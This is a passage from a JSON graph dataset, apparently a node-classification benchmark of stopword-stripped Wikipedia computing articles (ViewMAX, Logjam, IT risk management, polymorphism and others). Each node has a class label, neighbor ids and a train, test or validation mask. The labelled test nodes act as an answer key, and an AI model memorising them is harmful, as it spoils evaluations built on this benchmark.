    "text": "ViewMAX:viewmax viewmax cua-compliant file manager supplied dr dos versions 5.0 6.0 based cut-down version digital research gem/3 graphical user interface modified run single application viewmax desktop support unneeded functions removed whilst new functions added time nevertheless systems remained close enough viewmax recognize gem desktop accessories .acc executables automatically allow native gem applications .app executables run inside viewmax environment without install launch gem first many display drivers gem 3.xx used viewmax well enabling viewmax used non-standard display adapters higher resolutions possible using default set viewmax drivers also digital research sid86 symbolic instruction debugger shipped dr dos 3.xx provided dedicated functions debug gem applications see gem-specific help sid86 gemsid used viewmax well originally named navigator beta versions viewmax 1.00 distributed dr dos 5.0 1990 provide equivalent dosshell ms-dos/pc dos 4.0 similar appearance digital research previous gem desktops – two fixed-size windows window would either contain icons representing drives directories files representation directory hierarchy supported underlying operating system dr dos file directory passwords access permissions supported network drives including cd-rom drives distinguished icon different local drives 1991 viewmax 2 distributed dr dos 6.0 various graphical improvements made release including controls 3d appearance user-selectable colour schemes directory tree enabled shown beside list icons rather instead various settings could stored configuration files named drdoscfg \\viewmax.ini flexible character set support viewmax 2 loaded display fonts standard dos .cpi file depending current code page rather using gem specific character set feature also incorporated freegem since 2005 dos/v-compatible japanese version viewmax distributed dr dos 6.0/v 1992 supported dbcs characters loaded font.sys screenhz.fnt support added dr dos task switcher taskmax present applications would launched separate tasks viewmax could switch taskmgr later operating systems novell dos 7 opendos 7.01 dr-dos 7.02 higher continued emulate task switcher api well viewmax 2 could used switch control multiple concurrently running full-screen dos tasks dr-dos preemptively multitasking kernel emm386 /multi taskmgr well viewmax 3 intended graphical file manager novell next version dr dos viewmax 3 included support colour icons movable resizable windows program groups background images underlying dr-dos optional multi-user security module loaded viewmax would also provide support extended world/group/owner access permission system although viewmax 3 part dr dos panther beta 1 distribution october 1992 never completed apparently abandoned favour apple novell star trek team project 1992/1993 remained unreleased well novell dos 7 dr dos 7.0 called 1994 came without graphical file manager caldera bought remaining digital research assets novell 23 july 1996 initial plans revive gem viewmax technologies low-footprint user interface opendos mobile applications caldera view plans abandoned caldera uk favour dr-webspyder grow closing dr-dos development center caldera uk early 1999 remaining source code viewmax 3 beta version published april 1999 us parent company caldera thin clients gpl following continued community request release sources shortly company changed name lineo switched linux-based technologies three months later various viewmax features previously found gem incorporated freegem since",
    "neighbors": [
      10113,
      6148,
      6921,
      3216,
      2840,
      2201,
      10273,
      7847,
      2729,
      7849,
      7983,
      8241,
      178,
      7986,
      10289,
      823,
      4409,
      5694,
      7999,
      4548,
      589,
      9166,
      10067,
      10083,
      5220,
      8301,
      1007,
      2672,
      3056,
      4337,
      9329,
      4727,
      11513,
      6778
    ],
    "mask": "Test"
  },
  {
    "node_id": 11563,
    "label": 2,
    "text": "Wizard_of_OS:wizard os openbsd 3.7 released may 19 2005 theme song made titled wizard os song chronicled openbsd developers struggle obtain open documentation wireless cards manufacturers taiwan like ralink realtek cooperative companies contacted based work pink floyd notably style 1973 album dark side moon showing similarities great gig sky breathe eclipse parody wizard oz effort theo de raadt project benevolent dictator life received fsf 2004 award advancement free software song co-arranged ty semaka jonathan lewis also recorded mixed mastered song",
    "neighbors": [
      7702,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 11564,
    "label": 3,
    "text": "Raster_interrupt:raster interrupt raster interrupt also called horizontal blank interrupt interrupt signal computer system used display timing usually though always generated system graphics chip scan lines frame readied send monitor display interrupt provides mechanism graphics registers changed mid-frame different values interrupt point allows single-color object multiple horizontal color bands example sprite repositioned give illusion sprites system supports limitation changes affect portion display interrupt n't allow colors sprites single scan line several popular home computers video game consoles included graphics chips supporting raster interrupts features could combined work like raster interrupts antic chip used atari 8-bit family includes display list interrupts dlis triggered display drawn antic chip considerably powerful inherently capable many features systems require raster interrupts duplicate antic mix multiple graphics modes screen display horizontal vertical overscan graphics fine scroll selected horizontal regions dlis atari typically used add additional color display reuse player/missile graphics elements c64 vic-ii flexible raster interrupt system raster interrupts cpu intervention necessary reuse sprites screen mix graphics modes selectively scroll screen regions nintendo entertainment system ppu graphics chip support true raster interrupts interrupt set trigger vertical blank interval arbitrary scan line instead required polling hit flag indicated first sprite drawn although early games like super mario bros. castlevania legend zelda managed produce effective split-screen scrolling method cpu-intensive later cartridges incorporated mmc circuitry prominently nintendo mmc3 chip kept track ppu address data lines generated raster interrupts msx2 computers feature dedicated yamaha v9938 video display processor vdp like nes supports 'vertical blank interrupts requires polling 'horizontal blank interrupts commonly used create split screens mix multiple video modes together one screen increase number unique colours screen beyond official spec prominent usage examples aleste series konami space manbow amiga computers include custom coprocessor called copper dedicated servicing raster interrupts copper runs program simple instructions directing wait specific vertical scan line horizontal beam position update contents custom chip hardware register typically used modifying display parameters mixing display modes reusing sprites changing color registers also used trigger cpu interrupt game boy ppu support four raster interrupts set trigger beginning specified scanline end scanlines horizontal blanking beginning scanlines beginning vertical blanking biggest drawback interrupt handler used first three requiring use dispatching code one condition used",
    "neighbors": [
      6400,
      10658,
      11462,
      6415,
      5457,
      11477,
      5851,
      5823
    ],
    "mask": "Test"
  },
  {
    "node_id": 11565,
    "label": 2,
    "text": "MirOS_Licence:miros licence miros licence free content licence software free cultural works graphical literal musical … originated miros project publications isc license used openbsd perceived problems wording america centric strong roots ucb bsd licence historical permission notice disclaimer focus modern explicit legible language usability european except uk specifically german authors hindering adoption authors legislations permissive “ bsd/mit-style ” licence another novelty licence specified kind copyrightable work start meets open source definition debian free software guidelines also open knowledge definition fact approved okfn long osi licence seen formal legal review listed ifross ’ licence centre webpages free software foundation formally added licence either free software licence free documentation license pages software directory category license accepted free content license according free cultural works definition",
    "neighbors": [
      6333
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11566,
    "label": 5,
    "text": "Multipurpose_Transaction_Protocol:multipurpose transaction protocol multipurpose transaction protocol mtp software proprietary transport protocol developed marketed data expedition inc. dei dei claims mtp offers superior performance reliability compared transmission control protocol tcp transport protocol mtp implemented using user datagram protocol udp packet format uses proprietary flow-control error-correction algorithms achieve reliable delivery data avoid network flooding mtp/ip uses proprietary algorithms compatible software must installed ends communication path use udp packet format permits compatibility standard internet protocol ip network hardware software mtp/ip applications may use available udp port number mtp applications use implemented several operating systems including versions microsoft windows macos linux freebsd solaris hardware platforms include variations x86 power isa arm mtp/ip marketed data expedition inc. trial versions applications use mtp/ip available company website",
    "neighbors": [
      5472,
      8386,
      3813,
      10985,
      5612,
      6797,
      9964,
      7983,
      10924,
      499,
      11413,
      823,
      5531,
      2045,
      3006,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 11567,
    "label": 4,
    "text": "IT_risk_management:risk management risk management application risk management methods information technology order manage risk i.e onlyinclude risk management considered component wider enterprise risk management system establishment maintenance continuous update information security management system isms provide strong indication company using systematic approach identification assessment management information security risks different methodologies proposed manage risks divided processes steps /onlyinclude according risk framework encompasses negative impact operations service delivery bring destruction reduction value organization also benefit enabling risk associated missing opportunities use technology enable enhance business project management aspects like overspending late delivery adverse business impact risk strictly tied uncertainty decision theory applied manage risk science i.e rationally making choices uncertainty generally speaking risk product likelihood times impact risk likelihood impact measure risk determined product threat vulnerability asset values current risk management framework risk would tik framework process risk management ongoing iterative process must repeated indefinitely business environment constantly changing new threats vulnerabilities emerge every day choice countermeasures controls used manage risks must strike balance productivity cost effectiveness countermeasure value informational asset protected onlyinclude certified information systems auditor review manual 2006 produced isaca international professional association focused governance provides following definition risk management risk management process identifying vulnerabilities threats information resources used organization achieving business objectives deciding countermeasures take reducing risk acceptable level based value information resource organization /onlyinclude risk management process allows managers balance operational economic costs protective measures achieve gains mission capability protecting systems data support organizations ’ missions process unique environment indeed pervades decision-making areas daily lives head organizational unit must ensure organization capabilities needed accomplish mission mission owners must determine security capabilities systems must provide desired level mission support face real world threats organizations tight budgets security therefore security spending must reviewed thoroughly management decisions well-structured risk management methodology used effectively help management identify appropriate controls providing mission-essential security capabilities risk management world quite complex multi faced activity lot relations complex activities picture right shows relationships different related terms american national information assurance training education center defines risk management field organizations many others comprehensive enterprise risk management erm place four objective categories addressed according committee sponsoring organizations treadway commission coso according risk framework isaca risk transversal four categories risk managed framework enterprise risk management risk appetite risk sensitivity whole enterprise guide risk management process erm provide context business objectives risk management whilst methodology describe specific methods nevertheless specify several processes constitute generic framework need followed processes may broken sub-processes may combined sequence may change risk management exercise must carry processes one form another following table compares processes foreseen three leading standards isaca risk framework recent risk practitioner-guide compares risk iso 27005 term methodology means organized set principles rules drive action particular field knowledge overall comparison illustrated following table due probabilistic nature need cost benefit analysis risks managed following process according nist sp 800-30 divided following steps effective risk management must totally integrated systems development life cycle information risk analysis conducted applications computer installations networks systems development undertaken using structured methodologies step first step iso iso/iec 27005 framework elementary activities foreseen first sub process risk assessment according nist sp 800-30 step implies acquisition relevant information organization determination basic criteria purpose scope boundaries risk management activities organization charge risk management activities purpose usually compliance legal requirements provide evidence due diligence supporting isms certified scope incident reporting plan business continuity plan another area application certification product criteria include risk evaluation risk acceptance impact evaluation criteria conditioned establishing scope boundaries organization studied mission values structure strategy locations cultural environment constraints budgetary cultural political technical organization collected documented guide next steps set organization charge risk management foreseen partially fulfilling requirement provide resources needed establish implement operate monitor review maintain improve isms main roles inside organization risk management recurrent activity deals analysis planning implementation control monitoring implemented measurements enforced security policy contrary risk assessment executed discrete time points e.g year demand etc – performance next assessment provides temporary view assessed risks parameterizing entire risk management process view relationship risk management risk assessment depicted figure adopted octave risk assessment often conducted one iteration first high-level assessment identify high risks iterations detailed analysis major risks risks according national information assurance training education center risk assessment field risk assessment receives input output previous step context establishment output list assessed risks prioritized according risk evaluation criteria process divided following steps following table compares iso 27005 processes risk framework processes iso/iec 27002:2005 code practice information security management recommends following examined risk assessment risk identification states could cause potential loss following identified output sub process made two methods risk assessment information security field quantitative qualitative purely quantitative risk assessment mathematical calculation based security metrics asset system application risk scenario taking consideration different risk factors single loss expectancy sle determined considering probability occurrence given period basis example annual rate occurrence aro annualized loss expectancy determined product aro x sle important point values assets considered involved assets value directly affected resource example consider risk scenario laptop theft threat consider value data related asset contained computer reputation liability company assets deriving lost availability confidentiality data could involved easy understand intangible assets data reputation liability worth much physical resources risk laptop hardware example intangible asset value huge easy evaluate consideration pure quantitative approach qualitative risk assessment three five steps evaluation high low performed organization requires risk assessment performed relatively short time meet small budget significant quantity relevant data available persons performing assessment n't sophisticated mathematical financial risk assessment expertise required qualitative risk assessment performed shorter period time less data qualitative risk assessments typically performed interviews sample personnel relevant groups within organization charged security asset assessed qualitative risk assessments descriptive versus measurable usually qualitative classification done followed quantitative evaluation highest risks compared costs security measures risk estimation input output risk analysis split following steps output list risks value levels assigned documented risk register risks arising security threats adversary attacks may particularly difficult estimate difficulty made worse least system connected internet adversary intent capability may attack physical closeness access necessary initial models proposed problem risk estimation generally three values given asset one loss one cia properties confidentiality integrity availability risk evaluation process receives input output risk analysis process compares risk level risk acceptance criteria prioritise risk list risk treatment indications determine likelihood future adverse event threats system must conjunction potential vulnerabilities controls place system impact refers magnitude harm could caused threat ’ exercise vulnerability level impact governed potential mission impacts produces relative value assets resources affected e.g. criticality sensitivity system components data risk assessment methodology encompasses nine primary steps risk mitigation second process according sp 800-30 third according iso 27005 risk management involves prioritizing evaluating implementing appropriate risk-reducing controls recommended risk assessment process elimination risk usually impractical close impossible responsibility senior management functional business managers use least-cost approach implement appropriate controls decrease mission risk acceptable level minimal adverse impact organization ’ resources mission risk treatment process aim selecting security measures risk produce risk treatment plan output process residual risks subject acceptance management list select appropriate security measures single organization choose appropriate one according business strategy constraints environment circumstances choice rational documented importance accepting risk costly reduce high led fact risk acceptance considered separate process risk transfer apply risk high impact easy reduce significantly likelihood means security controls insurance premium compared mitigation costs eventually evaluating mixed strategy partially treat risk another option outsource risk somebody efficient manage risk risk avoidance describe action ways conducting business changed avoid risk occurrence example choice storing sensitive information customers avoidance risk customer data stolen residual risks i.e risk remaining risk treatment decision taken estimated ensure sufficient protection achieved residual risk unacceptable risk treatment process iterated risk mitigation systematic methodology used senior management reduce mission risk risk mitigation achieved following risk mitigation options address greatest risks strive sufficient risk mitigation lowest cost minimal impact mission capabilities suggestion contained risk communication horizontal process interacts bidirectionally processes risk management purpose establish common understanding aspect risk among organization stakeholder establishing common understanding important since influences decisions taken risk reduction overview method specifically designed process presents comprehensible overview coherence risks measures residual risks achieve common understanding risk management ongoing never ending process within process implemented security measures regularly monitored reviewed ensure work planned changes environment rendered ineffective business requirements vulnerabilities threats change time regular audits scheduled conducted independent party i.e somebody control responsible implementations daily management isms security controls validated technical controls possible complex systems tested verified hardest part validate people knowledge procedural controls effectiveness real application daily business security procedures vulnerability assessment internal external penetration test instruments verifying status security controls information technology security audit organizational procedural control aim evaluating security systems organization evolving quite rapidly risk management cope changes change authorization risk evaluation affected systems processes periodically review risks mitigation actions monitoring system events according security monitoring strategy incident response plan security validation metrics fundamental activities assure optimal level security obtained important monitor new vulnerabilities apply procedural technical security controls like regularly updating software evaluate kinds controls deal zero-day attacks attitude involved people benchmark best practice follow seminars professional associations sector factors assure state art organization risk management practice effective risk management must totally integrated sdlc system ’ sdlc five phases initiation development acquisition implementation operation maintenance disposal risk management methodology regardless sdlc phase assessment conducted risk management iterative process performed major phase sdlc nist sp 800-64 devoted topic early integration security sdlc enables agencies maximize return investment security programs guide focuses information security components sdlc first descriptions key security roles responsibilities needed information system developments provided second sufficient information sdlc provided allow person unfamiliar sdlc process understand relationship information security sdlc document integrates security steps linear sequential a.k.a waterfall sdlc five-step sdlc cited document example one method development intended mandate methodology lastly sp 800-64 provides insight projects initiatives clearly defined sdlc-based developments service-oriented architectures cross-organization projects facility developments security incorporated information systems acquisition development maintenance implementing effective security practices following areas information systems security begins incorporating security requirements process new application system enhancement security designed system beginning security requirements presented vendor requirements phase product purchase formal testing done determine whether product meets required security specifications prior purchasing product correct processing applications essential order prevent errors mitigate loss unauthorized modification misuse information effective coding techniques include validating input output data protecting message integrity using encryption checking processing errors creating activity logs applied properly cryptographic controls provide effective mechanisms protecting confidentiality authenticity integrity information institution develop policies use encryption including proper key management disk encryption one way protect data rest data transit protected alteration unauthorized viewing using ssl certificates issued certificate authority implemented public key infrastructure system files used applications must protected order ensure integrity stability application using source code repositories version control extensive testing production back-off plans appropriate access program code effective measures used protect application files security development support processes essential part comprehensive quality assurance production control process would usually involve training continuous oversight experienced staff applications need monitored patched technical vulnerabilities procedures applying patches include evaluating patches determine appropriateness whether successfully removed case negative impact risk management scientific methodology criticized shallow major risk management programmes large organizations mandated us federal information security management act criticized avoiding complexity accompanies formal probabilistic model risks uncertainty risk management looks like process attempts guess rather formally predict future basis statistical evidence highly subjective assessing value assets likelihood threats occurrence significance impact however better way deal subject emerged quite hard list methods least partially support risk management process efforts direction done enisa report classified different methods regarding completeness free availability tool support result factor analysis information risk fair main document introduction factor analysis information risk fair risk management insight llc november 2006 outline methods lack rigorous definition risk factors fair another methodology deal risk management complements existing methodologies fair good acceptance mainly open group isaca isaca developed methodology called risk address various kind related risks chiefly security related risks integrated cobit general framework manage risk broader concept risk methodologies encompasses negative impact operations service delivery bring destruction reduction value organization also benefit\\value enabling risk associated missing opportunities use technology enable enhance business project management aspects like overspending late delivery adverse business impact build security initiative homeland security department united states cites fair initiative build security collaborative effort provides practices tools guidelines rules principles resources software developers architects security practitioners use build security software every phase development chiefly address secure coding 2016 threat sketch launched abbreviated cyber security risk assessment specifically small organizations methodology uses real options forecast prioritize fixed list high-level threats number standards risk risk management description see main article",
    "neighbors": [
      3969,
      5636,
      2190,
      399,
      5774,
      3473,
      8975,
      4755,
      2709,
      4117,
      8471,
      1709,
      433,
      2737,
      8881,
      10034,
      3125,
      7228,
      8637,
      1479,
      11594,
      9293,
      3796,
      1369,
      10717,
      4062,
      3552,
      612,
      6373,
      7526,
      999,
      5353,
      2926,
      4206,
      3447,
      5373,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 11568,
    "label": 6,
    "text": "Mount_(computing):mount computing mounting process operating system makes files directories storage device available users access via computer file system general process mounting comprises operating system acquiring access storage medium recognizing reading processing file system structure metadata registering virtual file system vfs component location vfs newly-mounted medium registered called mount point mounting process completed user access files directories medium opposite process mounting called unmounting operating system cuts user access files directories mount point writes remaining queue user data storage device refreshes file system metadata relinquishes access device making storage device safe removal normally computer shutting every mounted storage undergo unmounting process ensure queued data got written preserve integrity file system structure media mount point location partition used root filesystem many different types storage exist including magnetic magneto-optical optical semiconductor solid-state drives magnetic media still common available hard disk drives less frequently floppy disks used storage means information read written must organized knowledge must available operating system organization called filesystem different filesystem provides host operating system metadata knows read write data medium media filesystem volume filesystem raid arrays mounted metadata read operating system use storage unix-like operating systems often include software tools assist mounting process provide new functionality strategies coined auto-mounting reflection purpose many situations file systems root need available soon operating system booted unix-like systems therefore provide facility mounting file systems boot time system administrators define file systems configuration file fstab vfstab solaris also indicates options mount points situations need mount certain file systems boot time although use may desired thereafter utilities unix-like systems allow mounting predefined file systems upon demand removable media become common microcomputer platforms allow programs data transferred machines without physical connection common examples include usb flash drives memory cards cd-roms dvds utilities therefore developed detect presence availability medium mount medium without user intervention unix-like systems also introduced concept called supermounting implemented linux supermount-ng project example floppy disk supermounted physically removed system normal circumstances disk synchronized unmounted removal provided synchronization occurred different disk inserted drive system automatically notices disk changed updates mount point contents reflect new medium similar functionality found windows machines automounter automatically mount file system reference made directory atop mounted usually used file systems network servers rather relying events insertion media would appropriate removable media",
    "neighbors": [
      2432,
      3975,
      4615,
      1801,
      2314,
      8328,
      1804,
      273,
      6935,
      6297,
      11675,
      2974,
      9343,
      9762,
      6436,
      10405,
      295,
      7975,
      9004,
      8110,
      7983,
      1456,
      4401,
      437,
      10933,
      4801,
      3522,
      451,
      8772,
      2762,
      7244,
      1741,
      590,
      6866,
      7379,
      5206,
      9689,
      8410,
      5086,
      739,
      10857,
      491,
      6637,
      6768,
      3826,
      7794,
      3572,
      5492,
      246,
      6263,
      376,
      8306,
      9972,
      1406,
      7423
    ],
    "mask": "Test"
  },
  {
    "node_id": 11569,
    "label": 4,
    "text": "Logjam_(computer_security):logjam computer security logjam security vulnerability diffie–hellman key exchange ranging 512-bit us export-grade 1024-bit keys discovered group computer scientists publicly reported may 20 2015 diffie–hellman key exchange depends security presumed difficulty solving discrete logarithm problem authors took advantage fact number field sieve algorithm generally effective method finding discrete logarithms consists four large computational steps first three depend order group g specific number whose finite log desired results first three steps precomputed saved used solve discrete log problem prime group relatively short time vulnerability known early 1992 turns much internet traffic uses one handful groups order 1024 bits less one approach enabled vulnerability authors demonstrated using man-in-the-middle network attacker downgrade transport layer security tls connection use 512-bit dh export-grade cryptography allowing read exchanged data inject data connection affects https smtps imaps protocols among others authors needed several thousand cpu cores week precompute data single 512-bit prime done however individual logarithms could solved minute using two 18-core intel xeon cpus cve id cve-2015-4000 authors also estimated feasibility attack 1024-bit diffie–hellman primes design many diffie–hellman implementations use pregenerated prime field considered secure since discrete log problem still considered hard big-enough primes even group known reused researchers calculated cost creating logjam precomputation one 1024-bit prime hundreds millions usd noted well within range fy2012 10.5 billion u.s. consolidated cryptologic program includes nsa reuse primes generating precomputation one prime would break two-thirds vpns quarter ssh servers globally researchers noted attack fits claims leaked nsa papers nsa able break much current cryptography recommend using primes 2048 bits defense switching elliptic-curve diffie–hellman ecdh claims pratical implications attack however disputed security researchers eyal ronen adi shamir paper critical review imperfect forward secrecy",
    "neighbors": [
      513,
      5636,
      517,
      1157,
      6023,
      1288,
      9744,
      1683,
      1688,
      10908,
      3742,
      2083,
      8358,
      9383,
      11693,
      9394,
      7736,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      3286,
      5078,
      5590,
      474,
      3805,
      7264,
      8674,
      7139,
      10341,
      5107,
      501,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 11570,
    "label": 2,
    "text": "Windows_Driver_Frameworks:windows driver frameworks windows driver frameworks wdf formerly windows driver foundation set microsoft tools libraries aid creation device drivers windows 2000 later versions windows complements windows driver model abstracting away much boilerplate complexity writing windows drivers wdf consists kernel-mode driver framework kmdf user-mode driver framework umdf individual frameworks provide new object-oriented programming model windows driver development primary goals wdf conceptual scalability reduced duplication enabling developers apply concepts across different driver types reducing code overhead required drivers differs markedly windows driver model wdm requires driver developers fully familiar many complex technical details write basic driver part key achieving conceptual scalability kmdf umdf use opt-in model model allows developer extend override default behavior canonical good driver contrast windows driver model depends driver writer implement aspects driver behavior three types wdf drivers wdf also includes set static verification tools use driver writers tools examine driver code common errors and/or simulate code driver order identify problems difficult detect difficult test bold yes means introduced version windows",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      6709,
      8246,
      4674,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      10900,
      10902,
      11414,
      3224,
      4771,
      7846,
      2221,
      10414,
      8391,
      5320,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      3303,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      8976,
      9491,
      11030,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      9009,
      315,
      7486,
      5952,
      1347,
      1348,
      844,
      847,
      1366,
      10079,
      11616,
      2401,
      7523,
      2943,
      9609,
      9612,
      7064,
      9114,
      10654,
      8607,
      11683,
      4010,
      10157,
      6584,
      2493,
      7629,
      11221,
      8161,
      6114,
      4074,
      9196,
      4590,
      11247,
      3573,
      9205,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 11571,
    "label": 1,
    "text": "Data_Transformation_Services:data transformation services data transformation services dts set objects utilities allow automation extract transform load operations database objects dts packages components utilities called dts tools dts included earlier versions microsoft sql server almost always used sql server databases although could used independently databases dts allows data transformed loaded heterogeneous sources using ole db odbc text-only files supported database dts also allow automation data import transformation scheduled basis perform additional functions ftping files executing external programs addition dts provides alternative method version control backup packages used conjunction version control system microsoft visual sourcesafe sql server versions 6.5 earlier database administrators dbas used sql server transfer manager bulk copy program included sql server transfer data tools significant shortcomings many dbas used third-party tools pervasive data integrator transfer data flexibly easily release sql server 7 1998 data transformation services packaged replace tools sql server 2000 expanded dts functionality several ways introduced new types tasks including ability ftp files move databases database components add messages microsoft message queue dts packages saved visual basic file sql server 2000 expanded save com-compliant language microsoft also integrated packages windows 2000 security made dts tools user-friendly tasks accept input output parameters dts comes editions sql server 7 2000 superseded sql server integration services microsoft sql server 2005 release 2005 dts package fundamental logical component dts every dts object child component package packages used whenever one modifies data using dts metadata data transformation contained within package packages saved directly sql server saved microsoft repository com files sql server 2000 also allows programmer save packages visual basic language file stored vb file package actually scripted—that vb script executed dynamically create package objects component objects package contain number connection objects contain allow package read data ole db-compliant data source expanded handle sorts data functionality package organized tasks steps dts task discrete set functionalities executed single step dts package task defines work item performed part data movement data transformation process job executed data transformation services supplies number tasks part dts object model accessed graphically dts designer accessed programmatically tasks configured individually cover wide variety data copying data transformation notification situations example following types tasks represent actions perform using dts executing single sql statement sending email transferring file ftp step within dts package describes order tasks run precedence constraints describe case damage failure steps executed sequentially parallel packages also contain global variables used throughout package sql server 2000 allows input output parameters tasks greatly expanding usefulness global variables dts packages edited password protected scheduled execution retrieved version dts tools packaged sql server include dts wizards dts designer dts programming interfaces dts wizards used perform simple common dts tasks include import/export wizard copy database wizard provide simplest method copying data ole db data sources great deal functionality available merely using wizard however package created wizard saved later altered one dts tools create publishing wizard also available schedule packages run certain times works sql server agent running otherwise package scheduled executed dts designer graphical tool used build complex dts packages workflows event-driven logic dts designer also used edit customize dts packages created dts wizard connection task dts designer shown specific icon icons joined precedence constraints specify order requirements tasks run one task may run instance another task succeeds fails tasks may run concurrently dts designer criticized unusual quirks limitations inability visually copy paste multiple tasks one time many shortcomings overcome sql server integration services dts successor graphical tool used build queries dts dts packages run command line using dtsrun utility utility invoked using following syntax passing parameters mapped global variables required include typeid rather difficult find microsoft site typeids used passing values",
    "neighbors": [
      1152,
      8835,
      7364,
      2183,
      5320,
      969,
      8878,
      847,
      2641,
      2901,
      11030,
      4183,
      9112
    ],
    "mask": "None"
  },
  {
    "node_id": 11572,
    "label": 6,
    "text": "File_Replication_Service:file replication service file replication service frs microsoft windows server service distributing shared files group policy objects replaced windows nt lan manager replication service partially replaced distributed file system replication also known ntfrs name executable file runs service one main uses frs sysvol directory share sysvol directory share particularly important microsoft network used distribute files supporting group policy scripts client computers network since group policies scripts run time user logs system important reliability multiple copies sysvol directory increases resilience spreads workload essential service sysvol directory accessed using network share server copy sysvol directory normally domain controller shown accessing using domain name servers work together provide service called replication partners control file replication windows server 2003 r2 windows server 2008 dfs replication available well file replication service dfs replication state-based replication engine file replication among dfs shares supports replication scheduling bandwidth throttling uses remote differential compression detect replicate change files rather replicating entire files changed windows vista also includes dfs replication service limited peer-to-peer dfs replication service groups frs still used sysvol replication optionally dfs replication may used instead frs replication sysvol shares frs stopped up-level windows server 2008 domain controllers sysvol replication performed using dfs replication default although ntfrs replication also supported windows server 2008/r2 up-level domain controllers sysvol replication performed using dfs replication ntfrs replication disabled altogether",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      11519,
      3856,
      3351,
      8473,
      11546,
      8988,
      9505,
      5928,
      3881,
      10024,
      10026,
      10029,
      9525,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 11573,
    "label": 2,
    "text": "FreeBSD_Documentation_License:freebsd documentation license freebsd documentation license license covers documentation freebsd operating system license similar 2-clause simplified bsd license used rest freebsd however makes meanings source code compile less ambiguous context documentation also includes mandatory disclaimer ieee open group text manual pages free software foundation classes free documentation license stating permissive non-copyleft free documentation license compatible gnu fdl based freebsd documentation license bsd documentation license created contain terms generic projects well reintroducing 3rd clause restricts use documentation endorsement purposes shown new bsd license",
    "neighbors": [
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      9625,
      1946,
      4636,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11698,
      1718,
      9784,
      1465,
      5177,
      5819,
      3006,
      11459,
      9927,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      1891,
      3684,
      998,
      9320,
      4073,
      8816,
      2545,
      3058,
      7027,
      9201,
      2421,
      9844,
      11506,
      2424,
      1273,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 11574,
    "label": 9,
    "text": "Polymorphism_(computer_science):polymorphism computer science programming languages type theory polymorphism provision single interface entities different types use single symbol represent multiple different types commonly recognised major classes polymorphism interest polymorphic type systems developed significantly 1960s practical implementations beginning appear end decade ad hoc polymorphism parametric polymorphism originally described christopher strachey fundamental concepts programming languages listed two main classes polymorphism ad hoc polymorphism feature algol 68 parametric polymorphism core feature ml type system 1985 paper peter wegner luca cardelli introduced term inclusion polymorphism model subtypes inheritance citing simula first programming language implement christopher strachey chose term ad hoc polymorphism refer polymorphic functions applied arguments different types behave differently depending type argument applied also known function overloading operator overloading term ad hoc context intended pejorative refers simply fact type polymorphism fundamental feature type system pascal delphi example codice_1 functions seem work generically various types looking invocations considered two entirely distinct functions compiler intents purposes dynamically typed languages situation complex correct function needs invoked might determinable run time implicit type conversion also defined form polymorphism referred coercion polymorphism parametric polymorphism allows function data type written generically handle values uniformly without depending type parametric polymorphism way make language expressive still maintaining full static type-safety concept parametric polymorphism applies data types functions function evaluate applied values different types known polymorphic function data type appear generalized type e.g list elements arbitrary type designated polymorphic data type like generalized type specializations made parametric polymorphism ubiquitous functional programming often simply referred polymorphism following example haskell shows parameterized list data type two parametrically polymorphic functions parametric polymorphism also available several object-oriented languages instance templates c++ name generics c java john c. reynolds later jean-yves girard formally developed notion polymorphism extension lambda calculus called polymorphic lambda calculus system f parametrically polymorphic function necessarily restricted working shape data instead value leading concept parametricity languages employ idea subtyping also called subtype polymorphism inclusion polymorphism restrict range types used particular case polymorphism languages subtyping allows function written take object certain type also work correctly passed object belongs type subtype according liskov substitution principle type relation sometimes written conversely said supertype —written subtype polymorphism usually resolved dynamically see following example make cats dogs subtypes animals procedure codice_2 accepts animal also work correctly subtype passed another example number rational integer types number rational number integer function written take number work equally well passed integer rational passed number actual type object hidden clients black box accessed via object identity fact number type abstract may even possible get hands object whose most-derived type number see abstract data type abstract class particular kind type hierarchy known—especially context scheme programming language—as numerical tower usually contains many types object-oriented programming languages offer subtype polymorphism using subclassing also known inheritance typical implementations class contains called virtual table —a table functions implement polymorphic part class interface—and object contains pointer vtable class consulted whenever polymorphic method called mechanism example goes popular object systems however common lisp object system provide multiple dispatch method calls polymorphic arguments interaction parametric polymorphism subtyping leads concepts variance bounded quantification row polymorphism similar distinct concept subtyping deals structural 